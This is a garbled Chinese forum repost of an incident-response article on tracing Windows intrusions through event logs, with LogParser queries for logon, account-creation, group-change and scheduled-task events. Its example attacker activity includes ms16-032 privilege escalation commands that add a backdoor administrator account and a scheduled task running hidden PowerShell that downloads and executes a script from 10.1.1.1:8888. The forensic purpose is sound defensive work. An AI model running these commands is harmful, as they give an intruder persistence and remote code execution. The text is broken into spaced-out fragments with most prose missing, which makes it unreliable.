[1032] 2020-12-14_在Windows日志里发现入侵痕迹

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2020-12-14_在Windows日志里发现入侵痕迹 W i n d o w s   B y p a s s   B y p a s s   2 0 2 0 - 1 2 - 1 4 W i n d o w s w e b s h e l l w e b w e b 访 E v e n t   I D I D w i n d o w s 1 w e b s h e l l W i n d o w s / L o g P a r s e r E v e n t   I D   4 6 8 8 B y p a s s c m d w h a m i s y s t e m i n f o C o n h o s t . e x e c m d . e x e 2 e x p s y s t e m W i n d o w s w h o a m i s y s t e m i n f o 4 6 8 8   4 6 8 9   L o g P a r s e r . e x e     - i : E V T   " S E L E C T   T i m e G e n e r a t e d , E v e n t I D , E X T R A C T _ T O K E N ( S t r i n g s , 1 , ' | ' )     a s   U s e r N a m e , E X T R A C T _ T O K E N ( S t r i n g s , 5 , ' | ' )     a s   P r o c e s s N a m e   F R O M   c : 1 1 . e v t x   w h e r e   E v e n t I D = 4 6 8 8 m s 1 6 - 0 3 2 . e x e   " w h o a m i " m s 1 6 - 0 3 2 . e x e   " n e t   u s e r   t e s t 1   a b c 1 2 3 !   / a d d " m s 1 6 - 0 3 2 . e x e   " n e t   l o c a l g r o u p   A d m i n i s t r a t o r s   t e s t 1   / a d d "
E v e n t   I D   4 7 2 0   t e s t E v e n t   I D   4 7 3 2 t e s t u s e r A d m i n i s t r a t o r s 3 W i n d o w s 使 L o g P a r s e r 1 0     t e s t I P 1 0 . 1 . 1 . 1 4 7 2 0     4 7 3 2     m s t s c   / v   1 0 . 1 . 1 . 1 8 8 4 6 2 4   4 6 2 5   L o g P a r s e r . e x e   - i : E V T   " S E L E C T   T i m e G e n e r a t e d   a s   L o g i n T i m e , E X T R A C T _ T O K E N ( S t r i n g s , 8 , ' | ' )   a s   E v e n t T y p e , E X T R A C T _ T O K E N ( S t r i n g s , 5 , ' | ' )   a s   u s e r n a m e , E X T R A C T _ T O K E N ( S t r i n g s , 1 8 , ' | ' )   a s   L o g i n i p  
4 便 使 W i n d o w s 访 访 访 s c h t a s k s . e x e E v e n t   I D   4 6 9 8 s c h t a s k s   / c r e a t e   / s c   m i n u t e   / m o   1   / t n   " S e c u r i t y   S c r i p t "   / t r   " p o w e r s h e l l . e x e   - n o p   - w   h i d d e n   - c   " I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " " " h t t p : / / 1 0 . 1 . 1 . 1 : 8 8 8 8 / l o g o . t x t " 4 6 9 8     4 6 9 9    
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则